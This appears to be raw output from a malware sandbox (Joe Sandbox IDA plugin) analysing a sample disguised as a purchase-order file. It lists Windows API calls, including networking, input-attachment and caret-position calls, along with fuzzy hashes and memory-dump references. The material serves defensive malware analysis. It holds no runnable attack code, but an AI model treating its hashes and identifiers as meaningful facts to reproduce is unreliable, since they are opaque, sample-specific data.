                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                            • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                            • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                            • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                            • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                            • __isleadbyte_l.LIBCMT ref: 004208A6
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                            • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                            • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                            • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                            APIs
                                                            • GetParent.USER32(?), ref: 004503C8
                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Proc$Parent
                                                            • String ID:
                                                            • API String ID: 2351499541-0
                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                            APIs
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchTranslate
                                                            • String ID:
                                                            • API String ID: 1795658109-0
                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                            APIs
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                            • _wcslen.LIBCMT ref: 00449519
                                                            • _wcslen.LIBCMT ref: 00449526
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 2886238975-0
                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                            APIs
                                                            Similarity
                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                            • String ID:
                                                            • API String ID: 1792727568-0
                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                            Similarity
                                                            • API ID: Window$Long$AttributesLayered
                                                            • String ID:
                                                            • API String ID: 2169480361-0
                                                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                            APIs
                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                            Strings
                                                            Similarity
                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                            • String ID: cdecl
                                                            • API String ID: 3850814276-3896280584
                                                            • Opcode ID: 98dc1614c8a6754c40beb179c63a7fe43b6a080dcdea2315c586b7862fcedbe6
                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                            • Opcode Fuzzy Hash: 98dc1614c8a6754c40beb179c63a7fe43b6a080dcdea2315c586b7862fcedbe6
                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                            APIs
                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                            • _memmove.LIBCMT ref: 0046D475
                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 2502553879-0
                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00448C69
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                            APIs
                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                            Similarity
                                                            • API ID: ErrorLastacceptselect
                                                            • String ID:
                                                            • API String ID: 385091864-0
                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                            • String ID:
                                                            • API String ID: 1358664141-0
                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Memory Dump Source
• Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
APIs
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
APIs
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
• InterlockedExchange.KERNEL32(?,?), ref: 0044B603
• LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
• LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
                                                            APIs
                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                            • __freeptd.LIBCMT ref: 0041516B
                                                             • ExitThread.KERNEL32 ref: 00415173
                                                             Note: the sequence __getptd_noexit, CloseHandle on the thread handle, __freeptd, ExitThread is the MSVC CRT's _endthreadex; this is statically linked runtime code, not sample-specific logic.
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1454798553-0
                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
